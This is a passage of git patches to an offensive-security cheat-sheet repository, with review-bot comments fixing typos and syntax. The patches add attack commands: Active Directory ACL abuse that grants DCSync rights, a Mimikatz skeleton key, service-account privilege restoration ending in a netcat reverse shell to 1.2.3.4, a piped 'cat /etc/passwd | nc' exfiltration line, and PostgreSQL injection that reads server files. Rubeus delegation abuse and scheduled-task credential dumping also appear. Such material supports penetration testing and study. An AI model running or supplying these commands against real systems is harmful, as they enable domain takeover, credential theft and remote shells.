particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` + + +#### WriteDACL + +To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. 
[Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'` + +```powershell +# Give DCSync right to the principal identity +Import-Module .\PowerView.ps1 +$SecPassword = ConvertTo-SecureString 'user1pwd' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN.LOCAL\user1', $SecPassword) +Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=local' -Rights DCSync -PrincipalIdentity user2 -Verbose -Domain domain.local +``` + ### Trust relationship between domains @@ -1571,4 +1621,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) * [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) * [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) -* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) \ No newline at end of file +* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) +* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation) \ No newline at end of file 
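Review bot: the GenericAll example has a typo that makes the filter silently match nothing: `$_.IdentinyReferenceName` should be `$_.IdentityReferenceName`, and both `Get-DomainUser -Identity | select serviceprincipalname` and `Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'}` are missing the `-Identity` target value. Under GenericWrite, the "Reset another user's password" item with `Set-DomainUserPassword` is the ForceChangePassword / GenericAll case that the removed bullets described; GenericWrite alone does not carry the User-Force-Change-Password extended right, so that item belongs under GenericAll, and the removed `WriteProperty on Group`, `Self (Self-Membership) on Group` and `ForceChangePassword` bullets are dropped with no replacement. Wording: "GenericAll/GenericWrite we can set a SPN" should read "With GenericAll/GenericWrite on a user we can set an SPN", "setted" should be "set", "unsafe configured" should be "unsafely configured", and `-PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` is still missing its closing quote.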
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 5f0b5ac..bd4ca44 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -17,6 +17,7 @@ * [Services](#services) * [Scheduled Task](#scheduled-task) * [RDP Backdoor](#rdp-backdoor) + * [Skeleton Key](#skeleton-key) * [References](#references) @@ -174,6 +175,15 @@ Hit F5 a bunch of times when you are at the RDP login screen. REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f ``` +### Skeleton Key + +```powershell +# Exploitation Command runned as DA: +Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName + +# Access using the password "mimikatz" +Enter-PSSession -ComputerName -Credential \Administrator +``` ## References diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index d4b05d6..c29fcbf 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md 
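Review bot: both commands in the Skeleton Key block are missing their targets, so they fail on copy-paste: `-ComputerName` has no host on either line and `-Credential \Administrator` has no domain; add visible placeholders such as `-ComputerName <dc>` and `-Credential <domain>\Administrator`. The comment "Exploitation Command runned as DA" should read "run as DA", and the block should say which account is being patched (the domain controller named in `-ComputerName`), since the second command authenticates to that same host with the `mimikatz` password.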
@@ -25,9 +25,11 @@ * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) * [EoP - Runas](#eop---runas) +* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies) * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) * [EoP - Impersonation Privileges](#eop---impersonation-privileges) + * [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges) * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) * [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) @@ -718,6 +720,21 @@ $computer = "" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) ``` +## EoP - Abusing Shadow Copies + +If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation. + +```powershell +# List shadow copies using vssadmin (Needs Admnistrator Access) +vssadmin list shadows + +# List shadow copies using diskshadow +diskshadow list shadows all + +# Make a symlink to the shadow copy and access it +mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ +``` + ## EoP - From local administrator to NT SYSTEM ```powershell @@ -758,6 +775,37 @@ Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary bel |`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`
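Review bot: in the Shadow Copies block `diskshadow list shadows all` runs two steps as one command: `diskshadow` is an interactive console (or takes `/s script.txt`), so show `diskshadow` on one line and `list shadows all` at its prompt. "Admnistrator" in the vssadmin comment is misspelled. The intro "it's an easy way for Privilege Escalation" is vague given that local administrator access is already assumed: state what is read from the copy once the `mklink` symlink exists, because the section stops at creating the link.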
2. `icalcs.exe "%windir%\system32" /grant "%username%":F`
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | |`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.

To be verified. || +### Restore A Service Account's Privileges + +> This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only. + +```powershell +# https://github.com/itm4n/FullPowers + +c:\TOOLS>FullPowers +[+] Started dummy thread with id 9976 +[+] Successfully created scheduled task. +[+] Got new token! Privilege count: 7 +[+] CreateProcessAsUser() OK +Microsoft Windows [Version 10.0.19041.84] +(c) 2019 Microsoft Corporation. All rights reserved. + +C:\WINDOWS\system32>whoami /priv +PRIVILEGES INFORMATION +---------------------- +Privilege Name Description State +============================= ========================================= ======= +SeAssignPrimaryTokenPrivilege Replace a process level token Enabled +SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled +SeAuditPrivilege Generate security audits Enabled +SeChangeNotifyPrivilege Bypass traverse checking Enabled +SeImpersonatePrivilege Impersonate a client after authentication Enabled +SeCreateGlobalPrivilege Create global objects Enabled +SeIncreaseWorkingSetPrivilege Increase a process working set Enabled + +c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z +``` + ### Meterpreter getsystem and alternatives @@ -794,7 +842,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n ### Juicy Potato (abusing the golden privileges) Binary available at : https://github.com/ohpe/juicy-potato/releases -:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809. +:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +. 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index cd27039..b1148a3 100644 --- a/Methodology and Resources/Windows - Using credentials.md 
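Review bot: the Juicy Potato hunk is an accidental edit: it splits "Windows 10 1809." into "1809" plus a new line containing only ".", which renders as a stray period paragraph; drop this hunk or restore the sentence on one line.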
+++ b/Methodology and Resources/Windows - Using credentials.md @@ -9,6 +9,8 @@ * [Metasploit](#metasploit) * [Metasploit - SMB](#metasploit-smb) * [Metasploit - Psexec](#metasploit-psexec) +* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) +* [WinRM](#winrm) * [Crackmapexec](#crackmapexec) * [Winexe](#winexe) * [WMI](#wmi) @@ -99,6 +101,22 @@ python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth ``` +## Remote Code Execution with PS Credentials + +```powershell +$SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword) +Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami} +``` + +## WinRM + +```powershell +root@payload$ git clone https://github.com/Hackplayers/evil-winrm +root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] +root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' +``` + ## Winexe Integrated to Kali diff --git a/XSS Injection/Files/mouseover-xss-ecs.jpeg b/XSS Injection/Files/mouseover-xss-ecs.jpeg new file mode 100644 index 0000000000000000000000000000000000000000..0f7053a6a5bb1c95651d450b49be71967d619aab GIT binary patch literal 1148 
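Review bot: the WinRM block clones the evil-winrm repository and then calls `evil-winrm` as if it were on PATH, while the last line calls `evil-winrm.rb` instead; after a `git clone` the script is run as `ruby evil-winrm.rb ...` from the checkout (or installed with `gem install evil-winrm`, which provides the `evil-winrm` command), so pick one form and use it on both lines.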
diff --git a/XSS Injection/Files/onclick-xss-ecs.jpeg b/XSS Injection/Files/onclick-xss-ecs.jpeg new file mode 100644 index 0000000000000000000000000000000000000000..ccd2d0f6885981b685373173c11a875c8448d0b5 GIT binary patch literal 1123 Date: Sun, 3 May 2020 21:11:01 +0000 Subject: [PATCH 46/85] Update Windows - Privilege Escalation.md added Get-Process to list processes --- Methodology and Resources/Windows - Privilege Escalation.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index c29fcbf..f71519c 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -418,6 +418,7 @@ tasklist /v net start sc query Get-Service +Get-Process Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize ``` From 32b83da30226291b5c6b9e87d48fd46f6d875c22 Mon Sep 17 00:00:00 2001 From: joker2a Date: Mon, 4 May 2020 11:44:24 +0200 Subject: [PATCH 47/85] Update Linux - Privilege Escalation.md Add new privesc for (Centos/Redhat) Writable /etc/sysconfig/network-scripts/ --- .../Linux - Privilege Escalation.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index ae1705c..db7a558 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md 
@@ -497,6 +497,21 @@ find / -perm -2 -type f 2>/dev/null find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null ``` +### Writable /etc/sysconfig/network-scripts/ (Centos/Redhat) + +/etc/sysconfig/network-scripts/ifcfg-1337 for example + +```powershell +NAME=Network /bin/id <= Note the blank space +ONBOOT=yes +DEVICE=eth0 + +EXEC : +./etc/sysconfig/network-scripts/ifcfg-1337 +``` +src : [https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f] +(https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) + ### Writable /etc/passwd First generate a password with one of the following commands. From 53db029d4e9a102e7bf7e897a008f81e87978d43 Mon Sep 17 00:00:00 2001 From: DoI <5291556+denandz@users.noreply.github.com> Date: Tue, 5 May 2020 15:10:44 +1200 Subject: [PATCH 48/85] Added additional info to the Postgres SQLi page --- SQL Injection/PostgreSQL Injection.md | 31 ++++++++++++++++++++++++++- 1 file changed, 30 insertions(+), 1 deletion(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 00bbbf4..e2e4c09 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -14,6 +14,7 @@ * [PostgreSQL List tables](#postgresql-list-tables) * [PostgreSQL List columns](#postgresql-list-columns) * [PostgreSQL Error Based](#postgresql-error-based) +* [PostgreSQL XML Helpers](#postgresql-xml-helpers) * [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Time Based](#postgresql-time-based) * [PostgreSQL Stacked query](#postgresql-stacked-query) 
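Review bot: the `EXEC :` line `./etc/sysconfig/network-scripts/ifcfg-1337` has a spurious leading `.` (the file is created at `/etc/sysconfig/network-scripts/ifcfg-1337`) and, run that way, the file executes as the current user and escalates nothing; the section should say which privileged process sources the file (that is the whole point of `ONBOOT=yes`) instead of showing a direct execution. The fence is tagged `powershell` for a Linux ifcfg file and shell command; tag it `bash`. The `src` reference is also broken: the link text and URL are split across two lines, and the visible text drops the `?` (`exploitdetailsqidtp=` versus `exploitdetails?qidtp=`), so the rendered link shows a wrong URL.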
@@ -106,6 +107,21 @@ SELECT column_name FROM information_schema.columns WHERE table_name='data_table' ' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1 ``` +## PostgreSQL XML helpers + +```sql +select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row +``` + +The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result. + +```sql +select database_to_xml(true,true,''); -- dump the current database to XML +select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema +``` + +Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition. + ## PostgreSQL Blind ```sql @@ -135,7 +151,7 @@ select pg_ls_dir('./'); select pg_read_file('PG_VERSION', 0, 200); ``` -NOTE: ``pg_read_file` doesn't accept the `/` character. +NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer version (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or user's in the `default_role_read_server_files` group. ```sql CREATE TABLE temp(t TEXT); @@ -143,6 +159,12 @@ COPY temp FROM '/etc/passwd'; SELECT * FROM temp limit 1 offset 0; ``` +```sql +SELECT lo_import('/etc/passwd'); -- will create a large object from the file and return the OID +SELECT lo_get(16420); -- use the OID returned from the above +SELECT * from pg_largeobject; -- or just get all the large objects and their data +``` + ## PostgreSQL File Write ```sql 
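Review bot: the TOC entry added in the previous hunk reads `PostgreSQL XML Helpers` while this heading reads `PostgreSQL XML helpers`; the `#postgresql-xml-helpers` anchor still resolves, but the capitalisation should match the other section headings on the page.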
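Review bot: the role name in the new NOTE on `pg_read_file` / `pg_ls_dir` is wrong: the linked commit adds the default role `pg_read_server_files` (together with `pg_write_server_files` and `pg_execute_server_program`), not `default_role_read_server_files`; membership in `pg_read_server_files` is what lets a non-superuser read arbitrary paths with these functions.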
@@ -152,6 +174,12 @@ SELECT * FROM pentestlab; COPY pentestlab(t) TO '/tmp/pentestlab'; ``` +```sql +SELECT lo_from_bytea(43210, 'your file data goes in here'); -- create a large object with OID 43210 and some data +SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20 +SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport +``` + ## PostgreSQL Command execution ### CVE-2019–9193 @@ -181,3 +209,4 @@ SELECT system('cat /etc/passwd | nc '); * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) * [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) +* [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli) From 5aad5795d2131dfa8d773e281fddc6acfef25e47 Mon Sep 17 00:00:00 2001 From: DoI <5291556+denandz@users.noreply.github.com> Date: Tue, 5 May 2020 15:15:50 +1200 Subject: [PATCH 49/85] minor spelling fix --- SQL Injection/PostgreSQL Injection.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index e2e4c09..d21dfca 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md 
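Review bot: the `lo_put` comment is inaccurate: `lo_put(loid, offset, data)` writes at the given offset and overwrites what is there, and since `'your file data goes in here'` is 27 bytes, writing at offset 20 replaces bytes 20 to 26 rather than appending. Either use an offset equal to the current length or reword the comment to "write data at offset 20". As with the read hunk, `lo_export` is server-side and superuser-restricted by default, so say so, and add `lo_unlink(43210)` to remove the object once exported.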
@@ -151,7 +151,7 @@ select pg_ls_dir('./'); select pg_read_file('PG_VERSION', 0, 200); ``` -NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer version (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or user's in the `default_role_read_server_files` group. +NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer versions (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or users in the `default_role_read_server_files` group. ```sql CREATE TABLE temp(t TEXT); From eb28e4c28d0214473665fe16740ba923477b0c4f Mon Sep 17 00:00:00 2001 From: "reza.duty" Date: Wed, 6 May 2020 22:57:55 +0430 Subject: [PATCH 50/85] add Self Closing Script --- XSS Injection/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 8b46e60..15495bd 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -10,7 +10,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Javascript keylogger](#javascript-keylogger) - [Other ways](#other-ways) - [Identify an XSS endpoint](#identify-an-xss-endpoint) -- [XSS in HTML/Applications](#xss-in-htmlapplications) +- [XSS in HTML/Applications](#xss-in-llapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [XSS in PostMessage](#xss-in-postmessage) @@ -143,6 +143,7 @@ Svg payload "> ">(`Firefox` is the only browser which allows self closing script) Div payload
MOVE HERE
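Review bot: the parenthetical `(`Firefox` is the only browser which allows self closing script)` makes a browser-behaviour claim with no source next to it; the PortSwigger Research tweet added to the reference list later in this same patch is that source, so link it inline here as well. The backticks around Firefox mark a product name as code; drop them.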
@@ -1128,3 +1129,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) - [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) +- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056) From d0bb0f6f5b73368eec3a63fd1aa2ce9bb9ad2c36 Mon Sep 17 00:00:00 2001 From: Thomas Orlita Date: Sun, 10 May 2020 10:32:51 +0200 Subject: [PATCH 51/85] Update CSP Evaluator blog link --- XSS Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 15495bd..23db803 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -929,7 +929,7 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o ## CSP Bypass -Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://appio.dev/vulns/google-csp-evaluator/) +Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/) ### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27)) From 7f1c150edd0cec7fec4c2e1388bb7ffe59ce4753 Mon Sep 17 00:00:00 2001 
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 10 May 2020 16:17:10 +0200 Subject: [PATCH 52/85] Mimikatz Summary --- .../Active Directory Attack.md | 9 ++++- .../Windows - Mimikatz.md | 38 ++++++++++++++----- SQL Injection/MSSQL Injection.md | 3 +- XSS Injection/README.md | 2 +- 4 files changed, 40 insertions(+), 12 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 489fcd1..b6539e7 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -407,6 +407,11 @@ Get-NetGPOGroup ### Exploit Group Policy Objects GPO ```powershell +# Build and configure SharpGPOAbuse +git clone https://github.com/FSecureLABS/SharpGPOAbuse +Install-Package CommandLineParser -Version 1.9.3.15 +ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll + # Adding User Rights SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO" @@ -1250,7 +1255,9 @@ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Saving ticket in Administrator.ccache # Exploit with Rubeus -$ rubeus s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt +$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt +$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /ptt +$ dir \\dc.domain.com\c$ ``` diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index ff34988..46682b9 100644 --- a/Methodology and Resources/Windows - Mimikatz.md 
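Review bot: the `# Build and configure SharpGPOAbuse` block has no build step: it clones the repository, installs `CommandLineParser`, then runs `ILMerge.exe` on `C:\Release\SharpGPOAbuse.exe` and `C:\Release\CommandLine.dll`, which only exist after the solution has been compiled in Release. Add the compile step (or a comment saying "build the solution in Release first") between the `Install-Package` and `ILMerge` lines, and state where `Install-Package` is run, since that syntax fits both the NuGet Package Manager Console and PowerShell's PackageManagement module.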
+++ b/Methodology and Resources/Windows - Mimikatz.md @@ -2,15 +2,16 @@ ## Summary -* [Mimikatz - Execute commands](#) -* [Mimikatz - Extract passwords](#) -* [Mimikatz - Mini Dump](#) -* [Mimikatz - Golden ticket](#) -* [Mimikatz - Skeleton key](#) -* [Mimikatz - RDP session takeover](#) -* [Mimikatz - Credential Manager & DPAPI](#) -* [Mimikatz - Commands list](#) -* [Mimikatz - Powershell version](#) +* [Mimikatz - Execute commands](#mimikatz---execute-commands) +* [Mimikatz - Extract passwords](#mimikatz---extract-passwords) +* [Mimikatz - Mini Dump](#mimikatz---mini-dump) +* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash) +* [Mimikatz - Golden ticket](#mimikatz---golden-ticket) +* [Mimikatz - Skeleton key](#mimikatz---skeleton-key) +* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover) +* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) +* [Mimikatz - Commands list](#mimikatz---commands-list) +* [Mimikatz - Powershell version](#mimikatz---powershell-version) * [References](#references) ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png) @@ -109,6 +110,8 @@ rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab ## Mimikatz - RDP session takeover +Use `ts::multirdp` to patch the RDP service to allow more than two users. + Run tscon.exe as the SYSTEM user, you can connect to any session without a password. ```powershell @@ -125,6 +128,8 @@ net start sesshijack ``` + + ## Mimikatz - Credential Manager & DPAPI ```powershell 
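Review bot: the Summary gains `* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash)`, but no hunk in this patch adds a matching `## Mimikatz - Pass The Hash` heading; confirm the section already exists in the file, otherwise the anchor dangles. The other regenerated anchors look right (GitHub slugs `Credential Manager & DPAPI` to `credential-manager--dpapi`).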
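Review bot: the added sentence `Use `ts::multirdp` to patch the RDP service to allow more than two users.` does not say that this is a mimikatz module, nor where it fits relative to the `tscon.exe` steps that follow; a `mimikatz # ts::multirdp` line at the top of the fence below would make the order of operations explicit instead of leaving it as prose.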
@@ -141,6 +146,21 @@ $ mimikatz !sekurlsa::dpapi $ mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b ``` +Task Scheduled credentials + +```powershell +mimikatz(commandline) # vault::cred /patch +TargetName : Domain:batch=TaskScheduler:Task:{CF3ABC3E-4B17-ABCD-0003-A1BA192CDD0B} / +UserName : DOMAIN\user +Comment : +Type : 2 - domain_password +Persist : 2 - local_machine +Flags : 00004004 +Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +Attributes : 0 +``` + + ## Mimikatz - Commands list | Command |Definition| diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 2be3918..35836c8 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -239,4 +239,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/) * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf) * [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links) -* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) \ No newline at end of file +* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) +* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT) \ No newline at end of file 
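Review bot: `Task Scheduled credentials` should read `Scheduled Task credentials`, and the line deserves a sentence of context: the `TargetName : Domain:batch=TaskScheduler:Task:{...}` entry in the output shows these are Credential Manager vault entries created when a task is registered to run as `DOMAIN\user`, which is why `vault::cred /patch` lists them. Also reduce the double blank line before `## Mimikatz - Commands list` to one.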
